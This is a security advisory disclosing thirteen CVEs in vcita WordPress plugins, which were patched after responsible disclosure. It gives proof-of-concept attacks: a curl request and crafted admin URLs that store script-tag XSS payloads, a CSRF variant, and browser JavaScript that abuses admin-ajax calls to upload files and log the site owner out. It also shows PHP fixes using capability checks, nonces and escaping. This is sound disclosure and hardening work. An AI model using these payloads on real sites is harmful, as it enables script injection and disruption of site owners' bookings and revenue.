On 02/02/2023 I discovered several security vulnerabilities in the WordPress plugins by vcita and reached out to the company according to responsible disclosure principles. The company issued updates to fix the vulnerabilities on June 12.
The following CVEs have been assigned to the security vulnerabilities:
1. CVE-2023-2298 – Online Booking & Scheduling Calendar for WordPress by vcita <= 4.2.10 – Unauthenticated Stored Cross-Site Scripting
2. CVE-2023-2299 – Online Booking & Scheduling Calendar for WordPress by vcita <= 4.2.10 – Missing Authorization on REST-API
3. CVE-2023-2300 – Contact Form Builder by vcita <= 4.9.1 – Authenticated (Contributor+) Stored Cross-Site Scripting
4. CVE-2023-2301 – Contact Form Builder by vcita <= 4.9.1 – Cross-Site Request Forgery to Stored Cross-Site Scripting
5. CVE-2023-2302 – Contact Form and Calls To Action by vcita <= 2.6.4 – Authenticated (Contributor+) Stored Cross-Site Scripting
6. CVE-2023-2303 – Contact Form and Calls To Action by vcita <= 2.6.4 – Cross-Site Request Forgery to Stored Cross-Site Scripting
7. CVE-2023-2404 – CRM and Lead Management by vcita <= 2.6.2 – Authenticated (Contributor+) Stored Cross-Site Scripting
8. CVE-2023-2405 – CRM and Lead Management by vcita <= 2.6.2 – Cross-Site Request Forgery to Stored Cross-Site Scripting
9. CVE-2023-2406 – Event Registration Calendar By vcita <= 1.3.1 & Online Payments – Get Paid with PayPal, Square & Stripe <= 3.9.1 – Authenticated (Contributor+) Stored Cross-Site Scripting
10. CVE-2023-2407 – Event Registration Calendar By vcita <= 1.3.1 & Online Payments – Get Paid with PayPal, Square & Stripe <= 3.9.1 – Cross-Site Request Forgery to Stored Cross-Site Scripting
11. CVE-2023-2414 – Online Booking & Scheduling Calendar for WordPress by vcita <= 4.2.10 – Missing Authorization to Settings Update and Media Upload
12. CVE-2023-2415 – Online Booking & Scheduling Calendar for WordPress by vcita <= 4.2.10 – Missing Authorization to Account Logout
13. CVE-2023-2416 – Online Booking & Scheduling Calendar for WordPress by vcita <= 4.2.10 – Cross-Site Request Forgery to Account Logout
Online Booking & Scheduling Calendar for WordPress by vcita (4.1 – 4.2.10)
Stored Cross Site Scripting, Missing Authentication
3000+ active installs, ~ 400.000 downloads
The plugin exposes an unprotected REST route that sets the connection parameters for the vcita account link. The submitted values are stored in the database without any validation and are later inserted into the website without any sanitization.
Proof of Concept
1. The attacker sends the following curl request to a website that uses the vcita widget. The request updates the `uid`, `business_id`, `business_name` and `email` values in the database:
```bash
curl --request POST \
  --url https://example.com/wp-json/vcita-wordpress/v1/actions/auth \
  --header 'Content-Type: application/json' \
  --data '{
    "success": true,
    "user_data": {
      "business_id": "\"; alert(1); //",
      "business_name": "Evil Eve",
      "email": "[email protected]"
    }
  }'
```
2. The injected `alert(1)` is executed on the live website.
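For comparison, here is how a REST route of this kind is registered and handled so that neither the missing authorization nor the stored XSS is possible. This is an added example written for this advisory, not vcita's code; the namespace `example-vendor/v1`, the option name `example_connection`, the `manage_options` requirement and the business-id format are assumptions chosen for illustration.

```php
<?php
// Added example, not the plugin's code. Names and the capability are assumptions.

add_action( 'rest_api_init', function () {
    register_rest_route( 'example-vendor/v1', '/actions/auth', array(
        'methods'  => 'POST',
        'callback' => 'example_handle_auth',
        // The missing piece in the vulnerable route: without a permission
        // callback, any unauthenticated visitor can call it. Here only users
        // who may manage the site can store connection parameters.
        'permission_callback' => function () {
            return current_user_can( 'manage_options' );
        },
        // Declaring the argument lets the REST layer reject malformed input
        // before the callback runs.
        'args' => array(
            'user_data' => array( 'required' => true, 'type' => 'object' ),
        ),
    ) );
} );

function example_handle_auth( WP_REST_Request $request ) {
    $data = (array) $request->get_param( 'user_data' );

    // Sanitize each value on the way in and reject anything that does not
    // match the expected shape instead of storing whatever arrived.
    $business_id   = isset( $data['business_id'] ) ? sanitize_text_field( $data['business_id'] ) : '';
    $business_name = isset( $data['business_name'] ) ? sanitize_text_field( $data['business_name'] ) : '';
    $email         = isset( $data['email'] ) ? sanitize_email( $data['email'] ) : '';

    // Assumed format for a business id: a short opaque token.
    if ( ! preg_match( '/^[A-Za-z0-9_-]{1,64}$/', $business_id ) ) {
        return new WP_Error( 'invalid_business_id', 'Invalid business id.', array( 'status' => 400 ) );
    }
    if ( ! is_email( $email ) ) {
        return new WP_Error( 'invalid_email', 'Invalid email.', array( 'status' => 400 ) );
    }

    update_option( 'example_connection', array(
        'business_id'   => $business_id,
        'business_name' => $business_name,
        'email'         => $email,
    ) );

    return rest_ensure_response( array( 'success' => true ) );
}

// Output side: stored values are escaped for the context they are printed
// into. Handing them to JavaScript as JSON closes the `"; alert(1); //`
// break-out shown in the proof of concept, because json_encode escapes the
// quote and the slash in `</script>`.
function example_print_widget_config() {
    $conn          = get_option( 'example_connection', array() );
    $business_id   = isset( $conn['business_id'] ) ? $conn['business_id'] : '';
    $business_name = isset( $conn['business_name'] ) ? $conn['business_name'] : '';

    echo '<script>var exampleWidget = ' . wp_json_encode( array( 'business_id' => $business_id ) ) . ';</script>';
    echo '<div data-business="' . esc_attr( $business_id ) . '">' . esc_html( $business_name ) . '</div>';
}
```

Since WordPress 5.5 a route registered without `permission_callback` triggers a `_doing_it_wrong` notice, which is a useful signal when reviewing plugins for this class of bug; a `permission_callback` of `__return_true` is the deliberate way to declare a route public, and should stand out in review for any route that writes settings.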
Contact Form Builder by vcita (<= 4.9.1)
2000+ active installs, ~ 360.000 downloads
The plugin does not validate `$_GET` parameters and stores them directly in the database. These values are later inserted into the page without sanitization. The endpoint also lacks sufficient access control, since every user with the edit_posts capability can open it.
Proof of Concept
1. Case A: If the attacker has the edit_posts capability on the target website, they open the following URL: `example.com/wp-admin/admin.php?page=live-site-parse-vcita-callback&success=true&uid=a&first_name=a-a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a"/><script>alert(1);</script>`
Case B: If the attacker does not have the edit_posts capability, they trick a user who does have it into opening the URL.
2. The email field `a"/><script>alert(1);</script>` is stored in the database.
3. When an admin opens the plugin's settings page (`wp-admin/admin.php?page=live-site`) the alert is triggered.
Contact Form and Calls To Action by vcita (<= 2.6.4)
400+ active installs, ~ 135.000 downloads
The plugin adds a poorly protected endpoint that sets the connection parameters for the vcita account link. The values are stored in the database without any validation and are later inserted into the website without any sanitization.
Proof of Concept
1. Case A: If the attacker has the edit_posts capability on the target website, they open the following URL: `example.com/wp-admin/admin.php?page=lead-capturing-call-to-actions-by-vcita/vcita-callback.php&success=true&first_name=a-a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a"/><script>alert(1);</script>&uid=a"</script><script>alert(2);</script>`
Case B: If the attacker does not have the edit_posts capability, they trick a user who does have it into opening the URL above.
2. The fields `email=a"/><script>alert(1);</script>` and `uid=a"</script><script>alert(2);</script>` are stored in the database.
3. When a user opens the plugin's settings page (`/wp-admin/admin.php?page=lead-capturing-call-to-actions-by-vcita/vcita-settings-functions.php`) `alert(1)` is triggered. Any visitor gets `alert(2)` when browsing the infected site.
CRM and Lead Management by vcita (<= 2.6.2)
400+ active installs, ~ 40.000 downloads
The plugin adds a poorly protected endpoint that sets the connection parameters for the vcita account link. The values are stored in the database without any validation and are later inserted into the website without any sanitization.
Proof of Concept
1. Case A: If the attacker has the edit_posts capability on the target website, they open the following URL: `example.com/wp-admin/admin.php?page=crm-customer-relationship-management-by-vcita/vcita-callback.php&success=true&first_name=a-a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a"/><script>alert(1);</script>&uid=a"</script><script>alert(2);</script>`
Case B: If the attacker does not have the edit_posts capability, they trick a user who does have it into opening the URL above.
2. The fields `email=a"/><script>alert(1);</script>` and `uid=a"</script><script>alert(2);</script>` are stored in the database.
3. When a user opens the plugin's settings page (`/wp-admin/admin.php?page=crm-customer-relationship-management-by-vcita/vcita-settings-functions.php`) `alert(1)` is triggered. Any visitor gets `alert(2)` when browsing the infected site.
Event Registration Calendar By vcita (<= 1.3.1)
100+ active installs, ~ 25.000 downloads
The plugin adds a poorly protected endpoint that sets the connection parameters for the vcita account link. The values are stored in the database without any validation and are later inserted into the website without any sanitization.
Proof of Concept
1. Case A: If the attacker has the edit_posts capability on the target website, they open the following URL: `example.com/wp-admin/admin.php?page=live-site-parse-vcita-callback&success=true&first_name=a-a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a"/><script>alert(1);</script>&uid=a`
Case B: If the attacker does not have the edit_posts capability, they trick a user who does have it into opening the URL above.
2. The fields `email=a"/><script>alert(1);</script>` and `uid=a"</script><script>alert(2);</script>` are stored in the database.
3. When a user opens the plugin's settings page (`/wp-admin/admin.php?page=crm-customer-relationship-management-by-vcita/vcita-settings-functions.php`) `alert(1)` is triggered.
Online Payments – Get Paid with PayPal, Square & Stripe (<= 3.9.1)
300+ active installs, ~ 50.000 downloads
The plugin adds a poorly protected endpoint that sets the connection parameters for the vcita account link. The values are stored in the database without any validation and are later inserted into the website without any sanitization.
Proof of Concept
1. Case A: If the attacker has the edit_posts capability on the target website, they open the following URL: `example.com/wp-admin/admin.php?page=live-site-parse-vcita-callback&success=true&uid=a&first_name=a-a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a"/><script>alert(1);</script>`
Case B: If the attacker does not have the edit_posts capability, they trick a user who does have it into opening the URL above.
2. The email field `a"/><script>alert(1);</script>` is stored in the database.
3. When an admin opens the plugin's settings page (`wp-admin/admin.php?page=live-site`) the alert is triggered (vcita has to be connected). In Case B, if an admin opens the link, the site redirects directly to the infected page.
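The five admin callback pages above (Contact Form Builder, Contact Form and Calls To Action, CRM and Lead Management, Event Registration Calendar and Online Payments) share one weakness: a page reachable by contributors that writes `$_GET` values into options with no nonce and no sanitization, and a settings page that prints them back unescaped. The following added example, written for this advisory and not taken from any vcita plugin, shows the same callback flow with the three missing controls in place. The menu slug `example-vendor-callback`, the option name `example_connection`, the nonce action `example_callback` and the `manage_options` requirement are assumptions for illustration.

```php
<?php
// Added example, not the plugin's code. Slug, option name, nonce action and
// capability are assumptions.

add_action( 'admin_menu', function () {
    // Register the callback page for administrators only. WordPress enforces
    // the capability before the render callback runs, so a contributor
    // (edit_posts) cannot reach the page at all.
    add_options_page(
        'Connection callback',
        'Connection callback',
        'manage_options',
        'example-vendor-callback',
        'example_render_callback_page'
    );
} );

// The link that leads to the callback page is built with a nonce, so a URL
// crafted by a third party (Case B above) cannot pass the check below.
function example_callback_url( array $params ) {
    $url = add_query_arg( $params, admin_url( 'options-general.php?page=example-vendor-callback' ) );
    return wp_nonce_url( $url, 'example_callback' );
}

function example_render_callback_page() {
    // Second line of defence: re-check the capability inside the handler.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }

    // CSRF protection: verifies the _wpnonce query argument added by
    // wp_nonce_url() and stops with an error page if it is missing or stale.
    check_admin_referer( 'example_callback' );

    // Accept only the parameters we expect and sanitize each one on input.
    $uid   = isset( $_GET['uid'] ) ? sanitize_key( wp_unslash( $_GET['uid'] ) ) : '';
    $first = isset( $_GET['first_name'] ) ? sanitize_text_field( wp_unslash( $_GET['first_name'] ) ) : '';
    $last  = isset( $_GET['last_name'] ) ? sanitize_text_field( wp_unslash( $_GET['last_name'] ) ) : '';
    $email = isset( $_GET['email'] ) ? sanitize_email( wp_unslash( $_GET['email'] ) ) : '';

    // Reject rather than store: a uid containing '"</script>' is empty after
    // sanitize_key(), and an email with markup in it fails is_email().
    if ( '' === $uid || ! is_email( $email ) ) {
        wp_die( 'Invalid connection parameters.' );
    }

    update_option( 'example_connection', array(
        'uid'        => $uid,
        'first_name' => $first,
        'last_name'  => $last,
        'email'      => $email,
    ) );

    // Escape on output as well, matching the context: esc_html() for text
    // nodes, esc_attr() inside attribute values.
    echo '<div class="wrap">';
    echo '<p>Connected as <strong>' . esc_html( $first . ' ' . $last ) . '</strong> (' . esc_html( $email ) . ')</p>';
    echo '<input type="hidden" name="uid" value="' . esc_attr( $uid ) . '">';
    echo '</div>';
}
```

Input sanitization and output escaping are kept separate on purpose: the option may be read by other code paths (the public-facing widget, a REST response), and each of those must escape for its own context regardless of what was stored.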
Online Booking & Scheduling Calendar for WordPress by vcita (<= 4.2.10)
3000+ active installs, ~ 400.000 downloads
This privilege escalation allows any logged-in user (subscriber level is sufficient) to upload an arbitrary number of files to the Media Library.
Proof of Concept
1. Attacker registers on the website.
2. The attacker adds a new input field in the browser, `<input type="file" name="my_files[]">`, and selects an image file (vcita_save_settings_callback does check for allowed MIME types).
3. The attacker opens the browser's developer tools and runs the following JavaScript:
```javascript
const input = document.querySelector('input[type="file"]');
const file = input.files[0];
const formData = new FormData();
formData.append("widget_img", file);
const xhr = new XMLHttpRequest();
xhr.open(
  "POST",
  "https://example.com/wp-admin/admin-ajax.php?action=vcita_save_settings",
  true
);
xhr.send(formData);
```
4. The image is now uploaded to the website.
Online Booking & Scheduling Calendar for WordPress by vcita (<= 4.2.10)
3000+ active installs, ~ 400.000 downloads
This privilege escalation allows a logged-in user (subscriber level is sufficient) to log the administrator out of the vcita account. As a result, website visitors will not be able to make appointments and the owner of the website may lose a considerable amount of revenue.
Another attack vector would be to use Cross-Site Request Forgery (CSRF) to manipulate any logged in user to perform the logout.
Proof of Concept
1. The attacker registers on the website.
2. The attacker opens the browser's developer tools and runs the following JavaScript:
```javascript
fetch("/wp-admin/admin-ajax.php?action=vcita_logout", {
  method: "POST",
  headers: {
    Accept: "*/*",
    "Content-Type": "application/json",
  },
});
```
Alternative: manipulate any logged-in user into sending a POST request to the server.
3. The website's connection with the vcita account is deactivated.
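Both of the last two issues (the media upload via `vcita_save_settings` and the logout via `vcita_logout`) come from admin-ajax actions that run for any authenticated user and accept cross-origin POSTs. The following added example, written for this advisory and not taken from the plugin, shows the two handlers with the capability check and nonce check that close both the privilege escalation and the CSRF vector. The action names `example_save_settings` and `example_disconnect`, the option names, the script handle and the settings-page hook suffix are assumptions for illustration.

```php
<?php
// Added example, not the plugin's code. Action names, option names, script
// handle and page hook are assumptions.

// Only the wp_ajax_ (logged-in) hooks are registered. Logged-out requests to
// these actions are answered with HTTP 400 by admin-ajax.php.
add_action( 'wp_ajax_example_save_settings', 'example_ajax_save_settings' );
add_action( 'wp_ajax_example_disconnect', 'example_ajax_disconnect' );

function example_ajax_require_admin( $nonce_action ) {
    // Capability check: a subscriber is authenticated, but must not be able
    // to change the connection or add files to the media library.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }
    // Nonce check (CSRF): the request must carry a token issued to this user
    // by wp_create_nonce(); a page on another origin has no way to obtain it.
    // check_ajax_referer() exits with a -1 response when the check fails.
    check_ajax_referer( $nonce_action, 'nonce' );
}

function example_ajax_save_settings() {
    example_ajax_require_admin( 'example_save_settings' );

    if ( ! current_user_can( 'upload_files' ) || empty( $_FILES['widget_img'] ) ) {
        wp_send_json_error( array( 'message' => 'No file or not allowed.' ), 400 );
    }

    // Let WordPress handle the upload: it validates the real file type
    // against the allowed MIME list and creates the attachment post.
    require_once ABSPATH . 'wp-admin/includes/image.php';
    require_once ABSPATH . 'wp-admin/includes/file.php';
    require_once ABSPATH . 'wp-admin/includes/media.php';

    $attachment_id = media_handle_upload( 'widget_img', 0 );
    if ( is_wp_error( $attachment_id ) ) {
        wp_send_json_error( array( 'message' => $attachment_id->get_error_message() ), 400 );
    }

    update_option( 'example_widget_img', (int) $attachment_id );
    wp_send_json_success( array( 'attachment_id' => (int) $attachment_id ) );
}

function example_ajax_disconnect() {
    example_ajax_require_admin( 'example_disconnect' );
    delete_option( 'example_connection' );
    wp_send_json_success();
}

// The settings page script receives its nonces through wp_localize_script
// and sends each one as the 'nonce' field of the matching request.
add_action( 'admin_enqueue_scripts', function ( $hook ) {
    if ( 'toplevel_page_example-settings' !== $hook ) {
        return;
    }
    wp_enqueue_script( 'example-settings', plugins_url( 'settings.js', __FILE__ ), array(), '1.0', true );
    wp_localize_script( 'example-settings', 'exampleAjax', array(
        'url'             => admin_url( 'admin-ajax.php' ),
        'saveNonce'       => wp_create_nonce( 'example_save_settings' ),
        'disconnectNonce' => wp_create_nonce( 'example_disconnect' ),
    ) );
} );
```

The order of the two checks matters: the capability check first, so that an unprivileged user receives a clean 403 rather than a nonce failure, and the nonce check second, so that a privileged user's session cannot be driven from another site. Neither check on its own would have been enough here: a capability check alone still leaves the CSRF logout, and a nonce alone still lets a subscriber with a valid settings-page nonce upload files.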